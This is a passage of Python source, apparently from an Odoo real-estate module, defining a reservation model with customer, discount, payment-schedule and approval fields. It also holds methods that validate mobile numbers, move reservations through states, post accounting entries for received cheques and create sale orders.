fields.Datetime(string=\"Confirmation Date\")\r\n customer_id = fields.Many2one('res.partner', string=\"Customer\", required=True,\r\n domain=[('customer', '=', True), ('parent_id', '=', False)])\r\n address = fields.Char(string=\"Address\", related='customer_id.street')\r\n phone = fields.Char(string=\"Phone\", related='customer_id.phone')\r\n mobile = fields.Char(string=\"Mobile1\", related='customer_id.mobile')\r\n email = fields.Char(string=\"Email\", related='customer_id.email')\r\n user_ids = fields.Many2many('res.users', string=\"Sales Representative\", required=True, default=_default_users,\r\n )\r\n team_leader_ids = fields.Many2many('res.users', 'leader_reservation_user_rel', 'reservation_id', 'user_id',\r\n string='Team Leaders', compute='get_leader_and_manager', store=True)\r\n sales_manager_ids = fields.Many2many('res.users', 'manager_reservation_user_rel', 'reservation_id', 'user_id',\r\n string='Sales Manager', compute='get_leader_and_manager', store=True)\r\n id_no = fields.Char(string=\"Identification No.\")\r\n id_type = fields.Selection([('id', _(\"ID\")), ('passport', _(\"Passport\"))], string=\"Identification Type\")\r\n id_photo = fields.Binary(\"Photo ID\")\r\n property_price = fields.Float(string=\"Property Price\", compute=\"get_properties_prices\", readonly=True,\r\n digits=(16, 6))\r\n discount = fields.Float(string=\"Discount Percentage\", digits=(16, 15))\r\n total_discount = fields.Float('Total Discount', compute='_compute_total_discount', store=True)\r\n add_extension = fields.Boolean(string=\"Add Extension\")\r\n admin_status = fields.Boolean(string=\"under admin group\", compute='get_group_of_logged_user', default=True)\r\n sales_status = fields.Boolean(string=\"under Sales group\", compute='get_group_of_logged_user', default=False)\r\n net_price = fields.Float(string=\"Net Price\", compute='_calc_net_price', store=True, digits=(16, 6))\r\n discount_approval = fields.Boolean(string='Discount Approval')\r\n broker_ids = fields.Many2many('res.partner', 'res_broker_rel', 'product_id', 'res_id', _('Brokers'),\r\n domain=[('is_broker', '=', True)])\r\n sales_team_ids = fields.Many2many('crm.team', string=\"Sales Team\")\r\n hide_payment_button = fields.Boolean(string=\"Hide\")\r\n button_broker_paid = fields.Boolean(string=\"Hide Broker 
Payment button\")\r\n button_salescommission_paid = fields.Boolean(string=\"Hide Sales Commission Payment button\", default=False)\r\n receive_checks = fields.Boolean(string=\"Receive Checks\")\r\n undercollection_check = fields.Boolean(string=\"Under Collection\")\r\n initalized_check = fields.Boolean(string=\"Initalize\")\r\n reviewed_check = fields.Boolean(string=\"Review\")\r\n cancelled = fields.Boolean('Cancelled')\r\n approve_cancellation = fields.Boolean('Approve Cancellation')\r\n payment_approval = fields.Boolean(string='Payment Approval')\r\n request_exception = fields.Text('Exception Request')\r\n sale_order_id = fields.Many2one('sale.order', _('Order'), readonly=True)\r\n payment_strg_ids = fields.One2many('payment.strg', 'reserve_id', _('Payment'))\r\n is_payment_strg = fields.Boolean('Is Payment', default=False)\r\n attach_ids = fields.One2many('ir.attachment', 'reserve_id', string='Legal Papers')\r\n payment_attach_ids = fields.One2many('ir.attachment', 'cancel_reserve_id', string='Cancellation Papers')\r\n account_invoice_ids = fields.One2many('account.invoice', 'reserve_id', string='Commissions')\r\n state = fields.Selection([('draft', _(\"Draft\")), ('request_exception', _(\"Request For Exception\")),\r\n ('exception_approval', _(\"Exception Approved\")), ('in_progress', _(\"Reserved\")),\r\n ('confirm', _(\"Checks Received\")), ('under_collection', _(\"Under Collection\")),\r\n ('initialize', _(\"Contract Initialized\")), ('review', _(\"Contract Reviewed\")),\r\n ('create_so', _(\"Contracted\")), ('cancel', _(\"Cancel\"))], _('Status'), default='draft')\r\n receive_checks_journal_entry_id = fields.Many2one('account.move', _('Receive Checks'))\r\n under_collection__journal_entry_id = fields.Many2one('account.move', _('Under Collection'))\r\n\r\n # log users\r\n request_user_id = fields.Many2one('res.users', string=\"Requested By\")\r\n exception_approval_user_id = fields.Many2one('res.users', string=\"Exception Approved By\")\r\n exception_rejection_user_id = fields.Many2one('res.users', string=\"Exception Rejected By\")\r\n in_progress_user_id = fields.Many2one('res.users', string=\"Reserved By\")\r\n confirm_user_id = fields.Many2one('res.users', string=\"Confirmed By\")\r\n initialize_user_id = fields.Many2one('res.users', string=\"Contract Initialized By\")\r\n review_user_id = fields.Many2one('res.users', string=\"Contract Reviewed By\")\r\n contract_user_id = fields.Many2one('res.users', string=\"Contracted By\")\r\n cancel_user_id = fields.Many2one('res.users', string=\"Cancelled By\")\r\n\r\n mobile1_type = fields.Selection([('local', 'Local'), ('foreign', 'Foreign')], related='customer_id.mobile1_type',\r\n string=\"Mobile1 Type\")\r\n mobile2 = fields.Char('Mobile 2', related='customer_id.mobile2')\r\n mobile2_type = fields.Selection([('local', 'Local'), ('foreign', 'Foreign')], related='customer_id.mobile2_type',\r\n string=\"Mobile2 Type\")\r\n\r\n partner_ids = fields.Many2many('res.partner', string=\"Partners\", domain=get_partners)\r\n partners_name = fields.Char('Partners', compute='_get_partners_name')\r\n function = fields.Char('Job Title', related='customer_id.function')\r\n pdc_id = fields.Many2one('pds.status', \"Payment Method\")\r\n sales_customer_id = fields.Many2one('res.partner', string=\"Customer\")\r\n sales_employee_id = fields.Many2one('hr.employee', string=\"Employee\")\r\n currency_id = fields.Many2one('res.currency', compute='_get_company_currency',\r\n string=\"Currency\", help='Utility field to express amount currency')\r\n\r\n other = 
fields.Char(\"Other\")\r\n commission_flag = fields.Boolean(compute='_commission_flag')\r\n is_commission_created = fields.Boolean('Is Commission Created')\r\n created_date = fields.Datetime(string=\"Created on\", default=fields.datetime.today())\r\n\r\n _defaults = {\r\n 'created_date': lambda *a: time.strftime('%Y-%m-%d %H:%M:%S'),\r\n }\r\n\r\n @api.depends('account_invoice_ids')\r\n def _commission_flag(self):\r\n for rec in self:\r\n if rec.account_invoice_ids and rec.account_invoice_ids.ids:\r\n rec.commission_flag = True\r\n\r\n @api.multi\r\n @api.depends('user_ids', 'sales_team_ids')\r\n def get_leader_and_manager(self):\r\n user_obj = self.env['res.users']\r\n for record in self:\r\n team_leader_ids = []\r\n sales_manager_ids = []\r\n teams = self.env['crm.team'].search([])\r\n\r\n for user in record.user_ids:\r\n if user.sale_team_id and user.sale_team_id.user_id:\r\n if user.sale_team_id.user_id.id not in team_leader_ids:\r\n team_leader_ids.append(user.sale_team_id.user_id.id)\r\n for team in teams:\r\n if team.user_id.id == user.id and user.id not in team_leader_ids:\r\n team_leader_ids.append(user.id)\r\n record.team_leader_ids = user_obj.search([('id', 'in', team_leader_ids)])\r\n\r\n for team in record.sales_team_ids:\r\n if team.sales_manager_id:\r\n if team.sales_manager_id.id not in sales_manager_ids:\r\n sales_manager_ids.append(team.sales_manager_id.id)\r\n\r\n record.sales_manager_ids = user_obj.search([('id', 'in', sales_manager_ids)])\r\n\r\n @api.one\r\n def _get_company_currency(self):\r\n self.currency_id = self.env.user.company_id.currency_id\r\n\r\n @api.multi\r\n @api.depends('partner_ids')\r\n def _get_partners_name(self):\r\n for rec in self:\r\n partners_name = \"\"\r\n for partner in rec.partner_ids:\r\n if not partners_name:\r\n partners_name = partner.name\r\n else:\r\n partners_name += ' - ' + partner.name\r\n rec.partners_name = partners_name\r\n\r\n @api.constrains('mobile', 'mobile1_type')\r\n def check_mobile1_no(self):\r\n for val in self:\r\n if val.mobile and not val.mobile1_type:\r\n raise ValidationError(_(\"Sorry .. you must choose mobile 1 type !!\"))\r\n if val.mobile:\r\n mobile = val.mobile\r\n partner_obj = self.search(['|', ('mobile', '=', val.mobile), ('mobile2', '=', val.mobile)]).ids\r\n reservation_obj = self.env['rs.reservation'].search(\r\n ['&', '|', ('mobile', '=', val.mobile), ('mobile2', '=', val.mobile), '&', ('active', '=', True),\r\n ('partner_id', '=', False)])\r\n\r\n if len(mobile) != 11 and val.mobile1_type == 'local':\r\n raise ValidationError(_(\"Sorry .. mobile number must be 11 digit !!\"))\r\n\r\n if len(mobile) < 11 and val.mobile1_type == 'foreign':\r\n raise ValidationError(_(\"Sorry .. mobile number must be at least 11 digit !!\"))\r\n\r\n if not (mobile.isdigit()):\r\n raise ValidationError(_(\"Sorry .. Mobile number must contain integers only !!\"))\r\n\r\n if len(partner_obj) > 1:\r\n if val.id in partner_obj:\r\n partner_obj.remove(val.id)\r\n raise ValidationError(\r\n _('Mobile Number Already exist with customer (%s)') % self.search([('id', 'in', partner_obj)],\r\n limit=1).name)\r\n\r\n if reservation_obj:\r\n ctx = self._context\r\n if 'force_create_customer' in ctx:\r\n if not ctx['force_create_customer']:\r\n raise ValidationError(_(\"Sorry .. This mobile is already exist with active lead\"))\r\n else:\r\n raise ValidationError(_(\"Sorry .. 
This mobile is already exist with active lead\"))\r\n\r\n @api.constrains('mobile2', 'mobile2_type')\r\n def check_mobile2_no(self):\r\n for val in self:\r\n if val.mobile2 and not val.mobile2_type:\r\n raise ValidationError(_(\"Sorry .. you must choose mobile 2 type !!\"))\r\n if val.mobile2:\r\n mobile = val.mobile2\r\n partner_obj = self.search(['|', ('mobile', '=', val.mobile2), ('mobile2', '=', val.mobile2)]).ids\r\n reservation_obj = self.env['rs.reservation'].search(\r\n ['&', '|', ('mobile', '=', val.mobile2), ('mobile2', '=', val.mobile2), '&', ('active', '=', True),\r\n ('partner_id', '=', False)])\r\n\r\n if len(mobile) != 11 and val.mobile2_type == 'local':\r\n raise ValidationError(_(\"Sorry .. mobile number must be 11 digit !!\"))\r\n\r\n if len(mobile) < 11 and val.mobile2_type == 'foreign':\r\n raise ValidationError(_(\"Sorry .. mobile number must be at least 11 digit !!\"))\r\n\r\n if not (mobile.isdigit()):\r\n raise ValidationError(_(\"Sorry .. Mobile number must contain integers only !!\"))\r\n\r\n if len(partner_obj) > 1:\r\n if val.id in partner_obj:\r\n partner_obj.remove(val.id)\r\n raise ValidationError(\r\n _('Mobile Number Already exist with customer (%s)') % self.search([('id', 'in', partner_obj)],\r\n limit=1).name)\r\n\r\n if reservation_obj:\r\n ctx = self._context\r\n if 'force_create_customer' in ctx:\r\n if not ctx['force_create_customer']:\r\n raise ValidationError(_(\"Sorry .. This mobile is already exist with active Reservation\"))\r\n else:\r\n raise ValidationError(_(\"Sorry .. This mobile is already exist with active Reservation\"))\r\n\r\n @api.multi\r\n def check_button_salescommission_paid(self):\r\n for val in self:\r\n val.button_salescommission_paid = True\r\n\r\n @api.model\r\n def create(self, values):\r\n values['reservation_code'] = self.env['ir.sequence'].next_by_code('real.estate.reservation.id.seq')\r\n lead_id = self.env.context.get('default_lead_id')\r\n if lead_id:\r\n self.env['crm.lead'].search([('id', '=', lead_id)], limit=1).write({'active': False})\r\n return super(RsReservation, self).create(values)\r\n\r\n @api.multi\r\n def unlink(self):\r\n for record in self:\r\n if record.state in ['request_exception', 'exception_approval', 'confirm', 'in_progress', 'under_collection',\r\n 'initialize', 'review', 'create_so']:\r\n raise ValidationError(_('You must cancel reservation first.'))\r\n for property in record.unit_ids:\r\n property.write({'status': 'available'})\r\n return super(RsReservation, self).unlink()\r\n\r\n # @api.multi\r\n # @api.depends('created_date','reservation_code')\r\n # def name_get(self):\r\n # result = []\r\n # for val in self:\r\n # if val.created_date and val.reservation_code:\r\n # print val.created_date\r\n # print val.reservation_code\r\n # print val.id\r\n # created_date = dateutil.parser.parse(val.created_date).date()\r\n # name = val.reservation_code + ' - ' + str(created_date)\r\n # result.append((val.id, name))\r\n # print result,len(result)\r\n # return result\r\n\r\n def name_get(self, cr, uid, ids, context=None):\r\n res = []\r\n for record in self.browse(cr, uid, ids, context=context):\r\n name = record.reservation_code\r\n if record.created_date:\r\n created_date = dateutil.parser.parse(record.created_date).date()\r\n name = record.reservation_code + ' - ' + str(created_date)\r\n res.append((record.id, name))\r\n return res\r\n\r\n @api.multi\r\n def reservation_server_action(self):\r\n for rec in self:\r\n reservation_ids = self.env['rs.reservation'].search([])\r\n for reservation in 
reservation_ids:\r\n if reservation.created_date:\r\n d1 = datetime.datetime.strptime(reservation.created_date, \"%Y-%m-%d %H:%M:%S\").date()\r\n reservation_expiry = self.env['ir.values'].get_default('sky.height.settings', 'reservation_expiry')\r\n if (float_compare((datetime.date.today() - d1).days, reservation_expiry, 2) in [0,\r\n 1]) and reservation.state == 'draft':\r\n reservation.write({'state': 'cancel'})\r\n for unit in reservation.unit_ids:\r\n unit.write({'status': 'available'})\r\n\r\n @api.multi\r\n def write(self, vals):\r\n for record in self:\r\n if 'payment_strg_ids' in vals:\r\n # self._check_total_payment_amount()\r\n for payment_strg in vals['payment_strg_ids']:\r\n if len(payment_strg) >= 2 and payment_strg[0] != 0 and payment_strg[1] != 0 and type(\r\n payment_strg[2]) == dict and 'amount' in payment_strg[2]:\r\n record.is_payment_strg = True\r\n\r\n current_record = super(RsReservation, self).write(vals)\r\n user = self.env['res.users'].search([('id', '=', self.env.uid)])\r\n if len(vals) > 0 and vals.has_key('payment_strg_ids') and user.has_group('account.group_account_manager'):\r\n pass\r\n elif len(vals) > 0 and vals.has_key('payment_strg_ids') and user.has_group('account.group_account_user'):\r\n for payment in vals['payment_strg_ids']:\r\n if len(payment) == 3 and payment[2] != False:\r\n if len(payment[2]) == 1:\r\n if payment[2].has_key('journal_id'):\r\n pass\r\n else:\r\n raise ValidationError('Accountant can only edit in payment method')\r\n else:\r\n raise ValidationError('Accountant can only edit in payment method')\r\n\r\n return current_record\r\n\r\n @api.multi\r\n def copy(self, default=None):\r\n raise ValidationError(_(\"Sorry .. You Can't Duplicate The Reservation With Same Data!!\"))\r\n\r\n @api.multi\r\n @api.depends('discount', 'payment_term_discount')\r\n def _compute_total_discount(self):\r\n for record in self:\r\n record.total_discount = record.discount + record.payment_term_discount\r\n\r\n @api.multi\r\n @api.depends('discount', 'payment_term_discount', 'property_price')\r\n def _calc_net_price(self):\r\n for record in self:\r\n first_discount = record.property_price - (record.property_price * (record.payment_term_discount / 100.0))\r\n record.net_price = first_discount - (\r\n first_discount * (record.discount / 100.0))\r\n\r\n @api.multi\r\n @api.depends('created_date', 'reservation_date', 'confirm_date')\r\n def _compute_expire_dates(self):\r\n for val in self:\r\n if val.created_date:\r\n val.expire_date = (datetime.datetime.strptime(val.created_date,\r\n \"%Y-%m-%d %H:%M:%S\")) + datetime.timedelta(days=3)\r\n if val.reservation_date:\r\n val.reservation_expiry_date = (datetime.datetime.strptime(val.reservation_date, \"%Y-%m-%d %H:%M:%S\")) \\\r\n + datetime.timedelta(days=40)\r\n\r\n day1 = datetime.datetime.strptime(val.reservation_expiry_date, \"%Y-%m-%d %H:%M:%S\")\r\n day2 = datetime.datetime.now()\r\n val.expire_date_difference = (day2 - day1).days\r\n\r\n @api.constrains('pay_strategy_id', 'discount')\r\n def _check_installments(self):\r\n self._onchange_pay_strategy()\r\n old_payments = self.env['payment.strg'].search([('reserve_id', '=', False)])\r\n if old_payments:\r\n old_payments.sudo().unlink()\r\n\r\n @api.onchange('pay_strategy_id', 'discount')\r\n def _onchange_pay_strategy(self):\r\n inbound_payments = self.env['account.payment.method'].search([('payment_type', '=', 'inbound')])\r\n for rec in self:\r\n payments = []\r\n for payment in rec.payment_strg_ids:\r\n payment.write({\r\n 'reserve_id': False\r\n })\r\n if 
rec.pay_strategy_id and rec.pay_strategy_id.id:\r\n for payment_line in rec.pay_strategy_id.line_ids:\r\n payment_methods = inbound_payments and payment_line.journal_id.inbound_payment_method_ids or \\\r\n payment_line.journal_id.outbound_payment_method_ids\r\n if rec.created_date:\r\n date_order_format = datetime.datetime.strptime(rec.created_date, \"%Y-%m-%d %H:%M:%S\")\r\n else:\r\n date_order_format = datetime.date.today()\r\n payment_date = date_order_format\r\n if payment_line.days > 0:\r\n no_months = payment_line.days / 30\r\n date_order_day = date_order_format.day\r\n date_order_month = date_order_format.month\r\n date_order_year = date_order_format.year\r\n payment_date = date(date_order_year, date_order_month, date_order_day) + relativedelta(\r\n months=+no_months)\r\n cheque_status = 'draft'\r\n\r\n if payment_line.deposit:\r\n cheque_status = 'received'\r\n\r\n first_discount = rec.property_price - (\r\n rec.property_price * (rec.payment_term_discount / 100.0))\r\n net_price = first_discount - (\r\n first_discount * (rec.discount / 100.0))\r\n # net_price = rec.property_price - (\r\n # rec.property_price * ((rec.discount + rec.payment_term_discount)/ 100))\r\n\r\n # Todo If line is Maintenance Fee\r\n if payment_line.add_extension:\r\n payment_amount = payment_line.value_amount * rec.property_price\r\n\r\n else:\r\n payment_amount = payment_line.value_amount * net_price\r\n payment_arr = {'amount': payment_amount,\r\n 'payment_date': payment_date,\r\n 'journal_id': payment_line.journal_id.id,\r\n 'description': payment_line.payment_description,\r\n 'deposite': payment_line.deposit,\r\n 'cheque_status': cheque_status,\r\n 'add_extension': payment_line.add_extension,\r\n 'payment_method_id': payment_methods.id and payment_methods[0].id or False,\r\n 'property_ids': rec.unit_ids.ids\r\n }\r\n\r\n payments.append((0, 0, payment_arr))\r\n rec.payment_strg_ids = payments\r\n\r\n @api.multi\r\n def button_confirm_receive_checks(self):\r\n move_obj = self.env['account.move']\r\n move_line_obj = self.env['account.move.line']\r\n move_date = datetime.date.today()\r\n maintaince_move_date = datetime.date.today()\r\n maintaince = False\r\n for rec in self:\r\n if (float_compare(rec.discount, 0.0, 6) in [1]) and rec.discount_approval == False:\r\n raise ValidationError(_(\"Please Check Discount Approval\"))\r\n if rec.payment_strg_ids.ids and rec.is_payment_strg == True and rec.payment_approval == False:\r\n raise ValidationError(_(\"Please Check Payment Approval\"))\r\n if not rec.payment_attach_ids:\r\n raise ValidationError(_(\"You should attach Checks.\"))\r\n if rec.payment_attach_ids:\r\n if not any(attach.attach_type == 'checks' for attach in rec.payment_attach_ids):\r\n raise ValidationError(_(\"You should attach a File of type checks.\"))\r\n for attach in rec.payment_attach_ids:\r\n if attach.attach_type == 'checks' and attach.file_size == 0:\r\n raise ValidationError(_(\"You should attach 'Checks' file that has size.\"))\r\n if rec.payment_strg_ids:\r\n if any(payment_strg.bank_name.id == False and payment_strg.type == 'bank' for payment_strg in\r\n rec.payment_strg_ids):\r\n raise ValidationError(_(\"Installment Bank Is Missing\"))\r\n if any(payment_strg.cheque == False and payment_strg.type == 'bank' for payment_strg in\r\n rec.payment_strg_ids):\r\n raise ValidationError(_(\"Cheque Number Is Missing\"))\r\n\r\n credit_amount = 0\r\n debit_amount = 0\r\n maintaince_credit_amount = 0\r\n reservation_journal_id = self.env['ir.values'].get_default('sky.height.settings', 
'reservation_journal_id')\r\n if not reservation_journal_id:\r\n raise ValidationError(_(\"Please set reservation journal from configuration.\"))\r\n reservation_journal_obj = self.env['account.journal'].browse(reservation_journal_id)\r\n maintaince_journal_id = self.env['ir.values'].get_default('sky.height.settings', 'maintaince_journal_id')\r\n if not maintaince_journal_id:\r\n raise ValidationError(_(\"Please set maintaince journal from configuration.\"))\r\n maintaince_journal_obj = self.env['account.journal'].browse(maintaince_journal_id)\r\n\r\n reservation_move_obj = move_obj.create(\r\n {'date': datetime.date.today(), 'journal_id': reservation_journal_obj.id})\r\n\r\n for pay in rec.payment_strg_ids:\r\n line_journal = pay.journal_id\r\n line_name = '/'\r\n move_date = pay.payment_date\r\n if not pay.journal_id.default_credit_account_id or not pay.journal_id.default_debit_account_id:\r\n raise ValidationError(\r\n _('Please define default credit/debit accounts on the journal \"%s\".') % (pay.journal_id.name))\r\n if not pay.journal_id.default_credit_account_id or not pay.journal_id.default_debit_account_id:\r\n raise ValidationError(\r\n _('Please define default credit/debit accounts on the journal \"%s\".') % (rec.journal_id.name))\r\n\r\n if not pay.move_check and pay.journal_id and not pay.journal_id.show_checks:\r\n pay.write({'cheque_status': 'collection', 'partner_id': rec.customer_id.id,\r\n 'property_ids': rec.unit_ids.ids})\r\n else:\r\n pay.write({'cheque_status': 'received', 'partner_id': rec.customer_id.id,\r\n 'property_ids': rec.unit_ids.ids})\r\n\r\n if pay.move_check == False and pay.journal_id.type == 'bank':\r\n if not pay.journal_id.default_credit_account_id or not pay.journal_id.default_debit_account_id:\r\n raise ValidationError(_('Please define default credit/debit accounts on the journal \"%s\".') % (\r\n pay.journal_id.name))\r\n if float_compare(pay.maintainance_fees, 0.0, 6) in [1]:\r\n maintaince = True\r\n maintaince_credit_amount += pay.maintainance_fees\r\n maintaince_move_date = pay.payment_date\r\n line_journal = maintaince_journal_obj\r\n line_name = 'maintaince'\r\n move_line_obj.with_context(check_move_validity=False).create({\r\n 'move_id': reservation_move_obj.id,\r\n 'date': datetime.date.today(),\r\n 'date_maturity': pay.payment_date,\r\n 'journal_id': pay.journal_id.id,\r\n 'account_id': line_journal.default_credit_account_id.id,\r\n 'partner_id': rec.customer_id.id,\r\n 'project_id': pay.project_id.id,\r\n 'name': line_name,\r\n 'debit': pay.maintainance_fees,\r\n 'credit': 0.0,\r\n 'amount_currency': 0.0})\r\n debit_amount = pay.amount - pay.maintainance_fees\r\n else:\r\n if pay.add_extension:\r\n line_journal = maintaince_journal_obj\r\n line_name = 'maintaince'\r\n else:\r\n line_journal = pay.journal_id\r\n line_name = '/'\r\n debit_amount = pay.amount\r\n move_line_obj.with_context(check_move_validity=False).create({\r\n 'move_id': reservation_move_obj.id,\r\n 'date': datetime.date.today(),\r\n 'date_maturity': pay.payment_date,\r\n 'journal_id': pay.journal_id.id,\r\n 'account_id': line_journal.default_credit_account_id.id,\r\n 'partner_id': rec.customer_id.id,\r\n 'project_id': pay.project_id.id,\r\n 'name': '/',\r\n 'debit': debit_amount,\r\n 'credit': 0.0,\r\n 'amount_currency': 0.0})\r\n\r\n # credit_amount += debit_amount\r\n if not pay.add_extension:\r\n credit_amount += debit_amount\r\n else:\r\n # maintaince line credit\r\n move_line_obj.with_context(check_move_validity=False).create({\r\n 'move_id': 
reservation_move_obj.id,\r\n 'date': datetime.date.today(),\r\n 'date_maturity': pay.payment_date,\r\n 'journal_id': line_journal.id,\r\n 'account_id': rec.customer_id.extension_account_prereceivable.id,\r\n 'partner_id': rec.customer_id.id,\r\n 'name': 'maintaince',\r\n 'credit': pay.amount,\r\n 'debit': 0.0,\r\n 'amount_currency': 0.0})\r\n if maintaince:\r\n if not rec.customer_id.extension_account_prereceivable:\r\n raise ValidationError(_('Sorry .. please set maintaince account in customer!'))\r\n move_line_obj.with_context(check_move_validity=False).create({\r\n 'move_id': reservation_move_obj.id,\r\n 'date': maintaince_move_date,\r\n 'date_maturity': datetime.date.today(),\r\n 'journal_id': maintaince_journal_obj.id,\r\n 'account_id': rec.customer_id.extension_account_prereceivable.id,\r\n 'partner_id': rec.customer_id.id,\r\n 'name': 'maintaince',\r\n 'credit': maintaince_credit_amount,\r\n 'debit': 0.0,\r\n 'amount_currency': 0.0})\r\n if not rec.customer_id.property_unearned_revenu_account_prereceivable:\r\n raise ValidationError(_(\"Sorry .. set unearned revenue account in customer!\"))\r\n\r\n move_line_obj.with_context(check_move_validity=False).create({\r\n 'move_id': reservation_move_obj.id,\r\n 'date': datetime.date.today(),\r\n 'date_maturity': move_date,\r\n 'journal_id': reservation_journal_obj.id,\r\n 'account_id': rec.customer_id.property_unearned_revenu_account_prereceivable.id,\r\n 'partner_id': rec.customer_id.id,\r\n 'name': 'customer payment',\r\n 'credit': credit_amount,\r\n 'debit': 0.0,\r\n 'amount_currency': 0.0})\r\n reservation_move_obj.journal_id = reservation_journal_obj.id\r\n reservation_move_obj.post()\r\n if rec.state == 'in_progress':\r\n rec.write({'receive_checks': True, 'state': 'confirm'})\r\n if rec.state == 'initialize':\r\n rec.write({'receive_checks': True})\r\n return rec.write(\r\n {'receive_checks_journal_entry_id': reservation_move_obj.id, 'confirm_date': datetime.date.today(),\r\n 'confirm_user_id': self.env.user.id})\r\n\r\n @api.multi\r\n def create_sale_order(self):\r\n for val in self:\r\n\r\n sale_order_pool = self.env['sale.order']\r\n sale_order_line_pool = self.env['sale.order.line']\r\n\r\n if (float_compare(val.discount, 0.0, 6) in [1]) and val.discount_approval == False:\r\n raise ValidationError(_(\"Please Check Discount Approval\"))\r\n if val.payment_strg_ids.ids and val.is_payment_strg == True and val.payment_approval == False:\r\n raise ValidationError(_(\"Please Check Payment Approval\"))\r\n\r\n if not val.payment_attach_ids:\r\n raise ValidationError(_(\"You should attach signature .\"))\r\n if val.payment_attach_ids:\r\n if not any(attach.attach_type == 'signature' for attach in val.payment_attach_ids):\r\n raise ValidationError(_(\"You should attach a File of type signature.\"))\r\n for attach in val.payment_attach_ids:\r\n if attach.attach_type == 'signature' and attach.file_size == 0:\r\n raise ValidationError(_(\"You should attach 'Signature' file that has size.\"))\r\n\r\n # Create Sale Order\r\n vals = {}\r\n payments = []\r\n for payment_line in val.payment_strg_ids:\r\n payments.append((0, _, {'amount': payment_line.amount,\r\n 'payment_date': payment_line.payment_date,\r\n 'journal_id': payment_line.journal_id.id,\r\n 'bank_name': payment_line.bank_name.id,\r\n 'cheque': payment_line.cheque,\r\n 'move_check': payment_line.move_check,\r\n 'description': payment_line.description,\r\n 'cus_bank': payment_line.cus_bank.id,\r\n 'type': payment_line.type,\r\n 'payment_id': payment_line.payment_id.id,\r\n\r\n 
}))\r\n\r\n vals.update({'partner_id': val.customer_id.id,\r\n 'conditions': val.conditions,\r\n 'payment_term_id': val.pay_strategy_id.id,\r\n 'state': 'draft',\r\n 'pricelist_id': val.customer_id.property_product_pricelist.id,\r\n 'partner_invoice_id': val.customer_id.id,\r\n 'partner_shipping_id': val.customer_id.id,\r\n 'date_order': datetime.date.today(),\r\n 'order_policy': 'manual',\r\n 'company_id': val.customer_id.company_id.id,\r\n 'reservation_id': val.id,\r\n 'origin': val.name,\r\n 'fiscal_position': '1',\r\n 'payment_strg_ids': payments,\r\n\r\n })\r\n\r\n sale_id = sale_order_pool.create(vals)\r\n\r\n order_lines = {}\r\n for unit in val.unit_ids:\r\n order_lines.update(({'order_id': sale_id.id,\r\n 'product_id': unit.id,\r\n 'name': 'yttt',\r\n 'product_uom_qty': '1',\r\n 'price_unit': val.net_price,\r\n 'state': 'draft',\r\n 'company_id': '1',\r\n\r\n }))\r\n sale_order_line_pool.create(order_lines)\r\n val.lead_id.action_set_won()\r\n sale_id.action_done()\r\n unit.write({'status': 'contracted'})\r\n val.write({'state': 'create_so', 'sale_order_id': sale_id.id, 'contract_user_id': val.env.user.id})\r\n return True\r\n\r\n @api.multi\r\n def button_request_exception(self):\r\n for val in self:\r\n if (float_compare(val.discount, 0.0, 6) in [1]) and val.discount_approval == False:\r\n raise ValidationError(_(\"Please Check Discount Approval\"))\r\n if val.payment_strg_ids.ids and val.is_payment_strg == True and val.payment_approval == False:\r\n raise ValidationError(_(\"Please Check Payment Approval\"))\r\n if not val.request_exception:\r\n raise ValidationError(_('You Must Enter Exception Request'))\r\n return val.write({'state': 'request_exception', 'request_user_id': self.env.user.id})\r\n\r\n @api.multi\r\n def button_exception_approval(self):\r\n for val in self:\r\n if (float_compare(val.discount, 0.0, 6) in [1]) and val.discount_approval == False:\r\n raise ValidationError(_(\"Please Check Discount Approval\"))\r\n if val.payment_strg_ids.ids and val.is_payment_strg == True and val.payment_approval == False:\r\n raise ValidationError(_(\"Please Check Payment Approval\"))\r\n return val.write({'state': 'exception_approval', 'exception_approval_user_id': self.env.user.id})\r\n\r\n @api.multi\r\n def button_exception_rejection(self):\r\n for val in self:\r\n if (float_compare(val.discount, 0.0, 6) in [1]) and val.discount_approval == False:\r\n raise ValidationError(_(\"Please Check Discount Approval\"))\r\n if val.payment_strg_ids.ids and val.is_payment_strg == True and val.payment_approval == False:\r\n raise ValidationError(_(\"Please Check Payment Approval\"))\r\n\r\n return val.write({'state': 'draft', 'exception_rejection_user_id': self.env.user.id})\r\n\r\n @api.multi\r\n def button_initialize(self):\r\n for rec in self:\r\n if (float_compare(rec.discount, 0.0, 6) in [1]) and rec.discount_approval == False:\r\n raise ValidationError(_(\"Please Check Discount Approval\"))\r\n if rec.payment_strg_ids.ids and rec.is_payment_strg == True and rec.payment_approval == False:\r\n raise ValidationError(_(\"Please Check Payment Approval\"))\r\n if not rec.id_no:\r\n raise ValidationError(_('You Must Choose Id No.'))\r\n if not rec.id_type:\r\n raise ValidationError(_('You Must Choose ID Type'))\r\n if not rec.id_photo:\r\n raise ValidationError(_('You Must Choose Photo ID'))\r\n if not rec.attach_ids:\r\n raise ValidationError(_(\"You should attach legal papers.\"))\r\n if rec.attach_ids:\r\n if not any(attach.legal_type == 'legal1' for attach in rec.attach_ids):\r\n 
raise ValidationError(_(\"You should Select Legal Attachment 1 Type.\"))\r\n for attach in rec.attach_ids:\r\n if attach.legal_type == 'legal1' and attach.file_size == 0:\r\n raise ValidationError(_(\"You should attach 'Legal 1' file that has size.\"))\r\n\r\n return rec.write({'state': 'initialize', 'initialize_user_id': self.env.user.id, 'initalized_check': True})\r\n\r\n @api.multi\r\n def under_collection_check(self):\r\n account_move_obj = self.env['account.move']\r\n account_move_line_obj = self.env['account.move.line']\r\n maintaince = False\r\n for rec in self:\r\n credit_amount = 0\r\n debit_amount = 0\r\n maintaince_credit_amount = 0\r\n under_collection_journal_id = self.env['ir.values'].get_default('sky.height.settings',\r\n 'under_collection_journal_id')\r\n if (float_compare(rec.discount, 0.0, 6) in [1]) and rec.discount_approval == False:\r\n raise ValidationError(_(\"Please Check Discount Approval\"))\r\n if rec.payment_strg_ids.ids and rec.is_payment_strg == True and rec.payment_approval == False:\r\n raise ValidationError(_(\"Please Check Payment Approval\"))\r\n if not under_collection_journal_id:\r\n raise ValidationError(_(\"Please set under collection journal from skyheights configuration.\"))\r\n under_collection_journal_obj = self.env['account.journal'].browse(under_collection_journal_id)\r\n under_collection_move_obj = account_move_obj.create(\r\n {'date': datetime.date.today(), 'journal_id': under_collection_journal_obj.id})\r\n maintaince_journal_id = self.env['ir.values'].get_default('sky.height.settings', 'maintaince_journal_id')\r\n if not maintaince_journal_id:\r\n raise ValidationError(_(\"Please set maintaince journal from configuration.\"))\r\n maintaince_journal_obj = self.env['account.journal'].browse(maintaince_journal_id)\r\n if maintaince_journal_obj and not 